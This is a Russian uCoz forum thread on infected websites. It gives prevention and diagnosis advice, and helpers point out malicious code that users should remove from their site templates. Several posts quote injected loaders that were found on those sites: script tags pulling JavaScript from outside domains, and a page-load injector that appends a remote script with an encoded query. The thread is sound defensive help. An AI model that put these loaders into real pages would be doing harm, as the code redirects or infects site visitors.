Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    владиммир
    Сообщений: 2
    Репутация: 4

    Сообщение # 631 | 10:10:31 26 Сен 2013
    Помогите что сделать ? сайт illona.ru пишет что обнаружено вредоносное по
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 632 | 10:35:50 26 Сен 2013
    владиммир, может заклинание какое стоит прочитать, отворот например? )))
    Если серьёзно, то сайт очень грязный, много чужеродного кода.
    в блоке "Перевести сайт" удаляй
    <script src="http://xall-pc.ru/up.js" type="text/javascript"></script>
    владиммир
    Сообщений: 2
    Репутация: 4

    Сообщение # 633 | 10:45:24 26 Сен 2013
    Удалил. Но надпись осталась. Как ее убрать?
    khobotov63
    Сообщений: 32
    Репутация: 0

    Сообщение # 634 | 11:30:24 26 Сен 2013
    webanet, Не могу попасть на сайт http://norton-key.ucoz.ru/ , вместо него идет перенапровление на сайт http://kluchitut.com/ .Помогите исправить.
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 635 | 14:17:47 26 Сен 2013
    khobotov63, в блоке с пользователями онлайн удалить в 3 местах скрипт:
    <script src="http://kluchitut.com/ajacss.js"></script>
    и меня что-то никуда с главной не перенаправляло
    Сообщение отредактировал bandjuk - Четверг, 26 Сен 2013, 14:18:20
    khobotov63
    Сообщений: 32
    Репутация: 0

    Сообщение # 636 | 14:23:21 26 Сен 2013
    bandjuk, Благодарю. Я тоже три этих скрипта нашел, значит всё верно. А то что Вас не перенапровляло так это наверное потому что я уже лечил сайт в тот момент.
    Сообщение отредактировал khobotov63 - Четверг, 26 Сен 2013, 14:40:17
    Гламур
    Сообщений: 35
    Репутация: 0

    Сообщение # 637 | 23:32:36 26 Сен 2013
    Помогите пожалуйста, при заходе на сайт появляется картинка:

    Добавлено (26 Сен 2013, 23:32:36)
    ---------------------------------------------
    Сайт: http://www.daina-dianashop.ru/

    Прикрепления: 3624055.png (93.2 Kb)
    Интернет-магазин http://www.daina-dianashop.ru/
    sch779
    Сообщений: 703
    Репутация: 348

    Сообщение # 638 | 03:29:20 27 Сен 2013
    Цитата (zvezdochet)
    наверное администрация юкоз выносит решения о блокировке на основании сервиса,который рекомендует

    А юкоз тут при чем!? В данном случае сайт блокирует гугл по своей базе - у него и спрашивайте, что не нравится на этом сайте!
    Хотя, хром пишет о причине блокировки - где-то на сайте, очевидно, есть ссылка на сайт usoft, который в базах Гугла проходит, как распространитель пиратского софта.

    Цитата (Гламур)
    А это значит, что есть вирусы?

    Наоборот - вирустотал показал, что все 38 проверок различными антивирусами не обнаружили на сайте вируса.
    Это и не удивительно - онлайн-антивирусы ищут на сайтах признаки вирусов, а у Вас на сайте просто есть ссылка на другой сайт, который в базе Гугла числится распространителем вирусов.

    На Вашем сайте, в шаблоне подвала страницы, стоит подключение скрипта с сайта usoft.ucoz.org, который и не нравится Гуглу - уберите этот скрипт и все будет нормально. А код кнопки прокрутки в начало страницы возьмите в другом, более надежном, месте! Лучше - если сам скрипт будет находиться на Вашем сайте, а не "на стороне"!
    И наведите порядок с подвалом сайта - в IE страница скролится вниз до бесконечности!
    Виноват, скорее всего, скрипт с вышеупомянутого сайта - он, кстати, в IE не работает!
    Сообщение отредактировал sch779 - Пятница, 27 Сен 2013, 03:31:54
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 639 | 12:51:08 27 Сен 2013
    zvezdochet, если вас заблокировала система юкоз, то вы явно темой ошиблись и ваши домыслы тут точно не нужны. ведите переписку с тех.поддержкой. в данной теме такие вопросы точно не решаются. по поводу любых блокировок только в тех

    sch779,
    Цитата
    Это и не удивительно - онлайн-антивирусы ищут на сайтах признаки вирусов, а у Вас на сайте просто есть ссылка на другой сайт, который в базе Гугла числится распространителем вирусов.
    вы точно ошиблись. если это было так, то вдруг бы появился смысл в этих проверках. пока смысла в них нет, только вред. пока эти горе-серависы ищут испуганных бредо-резалтами лохов на платные очистки или просто являются забавой для народа на уровне лопанья шариков в онлайновских флеш игрушках. на данный момент нет ни одного сервиса, который бы "искал по признакам вирусов"
    а то что они обрабатывают, все идет уже по готовым базам антивирусов того же вирус тотала и по базам поисковиков. все. на данный момент все эти сервисы только вводят в заблуждение пользователей
    остальное вы очень правильно сказали

    отсюда и далее, все у кого стоит блокировка Malware сразу пишите в эту тему //forum.ucoz.ru/forum/35-31448-94 отсюда ваши сообщения будут удаляться. те кто уже не нашел в этой теме свои сообщения, ищите их в теме Аккаунт: удалён, заблокирован
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    BUB
    Сообщений: 39
    Репутация: 6

    Сообщение # 640 | 12:43:43 28 Сен 2013
    Здравствуйте. Недавно задавал вопрос по Вредоносному ПО на сайте, не могу поборот урлку на форуме, удалить нельзя никак

    Цитата
    Несколько лет назад приобрёл домен http://dcc-dsc.su
    успешно привязал его к стандартному http://donbass-scooter.clan.su

    Google стабильно жалуется на стандартный http://donbass-scooter.clan.su и блокирует доступ к нему
    исправил это переписью всех возможных ссылок со стандартного шаблона в текущих

    В шаблоне "Вид материалов" форума присутствует переменная $AVATAR_URL$
    Она вставляет аватар пользователя на форум в стандартном домене, а не в приобретённом. Как изменить эту переменную? (чтобы брала аватар по адресу с купленным доменом)
    Донецк на расстоянии одного клика
    ДОНЕЦКИЙ СКУТЕР КЛУБ
    Kapralpv
    Сообщений: 12
    Репутация: 2

    Сообщение # 641 | 11:57:20 30 Сен 2013
    Добрый день! Помогите решить проблему! На сайте soldafon.net срабатывает сторонний кликандер на страницах материалов (иногда не сразу, а через несколько кликов по внутренним ссылкам). Перерыл весь код - ничего не нашел. HELP!!!!

    P. S. Прошу прощения. Проблему вроде бы решил... Код был спрятан в форме добавления комментариев...
    Сообщение отредактировал Kapralpv - Понедельник, 30 Сен 2013, 12:03:30
    wartemw8496
    Сообщений: 26
    Репутация: -7
    Уровень замечаний:

    Сообщение # 642 | 22:45:03 30 Сен 2013
    Здравствуйте, у меня на мазиле стоит ABP - дополнение блокирующее рекламу, захожу, сегодня на сайт и вижу, реклама в правом верхнем
    углу - это что новая фишка от ucoz или кто-то всё-таки шустрый поставил левую
    рекламу на мой сайт? Помогите, пожалуйста, разобраться.
    Сообщение отредактировал wartemw8496 - Вторник, 01 Окт 2013, 01:42:35
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 643 | 22:58:42 30 Сен 2013
    wartemw8496, это стандартный рекламный баннер системы. отключается платно
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Regresami
    Сообщений: 1
    Репутация: 0

    Сообщение # 644 | 00:42:52 01 Окт 2013
    appstore-free.ucoz.ru
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 645 | 01:33:15 01 Окт 2013
    Regresami, это надо удалить

    Код
    <script type="text/javascript">
      (function(w) {
      var script = document.createElement('script');
      var i = setInterval(function() {
      if (typeof w.document.body !== 'undefined') {
      script.src = 'http://dsc.educational-programs.info' + '/?682565=MXgxN2MnKSomLiwhNnh0d3dwfHI';
      w.document.body.appendChild(script);
      clearInterval(i);
      }
      }, 200);
    })(window);
    </script>


    Код
    <script type="text/javascript">
      (function(w) {
      var script = document.createElement('script');
      var i = setInterval(function() {
      if (typeof w.document.body !== 'undefined') {
      script.src = 'http://xxabiypsqf.news-and-various.info' + '/?854866=Jm8mIHQwPj0xOTs2IW9jYGNnZGI';
      w.document.body.appendChild(script);
      clearInterval(i);
      }
      }, 200);
    })(window);
    </script>

    Код

    <script type="text/javascript">
      (function(w) {
      var script = document.createElement('script');
      var i = setInterval(function() {
      if (typeof w.document.body !== 'undefined') {
      script.src = 'http://dsc.educational-programs.info' + '/?682565=MXgxN2MnKSomLiwhNnh0d3dwfHI';
      w.document.body.appendChild(script);
      clearInterval(i);
      }
      }, 200);
    })(window);
    </script>


    последние два в самом низу шаблонов перед закрывающим боди

    первый в блоке с так ру

    и серфинг в системе не приветствуется
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск:
    Telegram
    Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!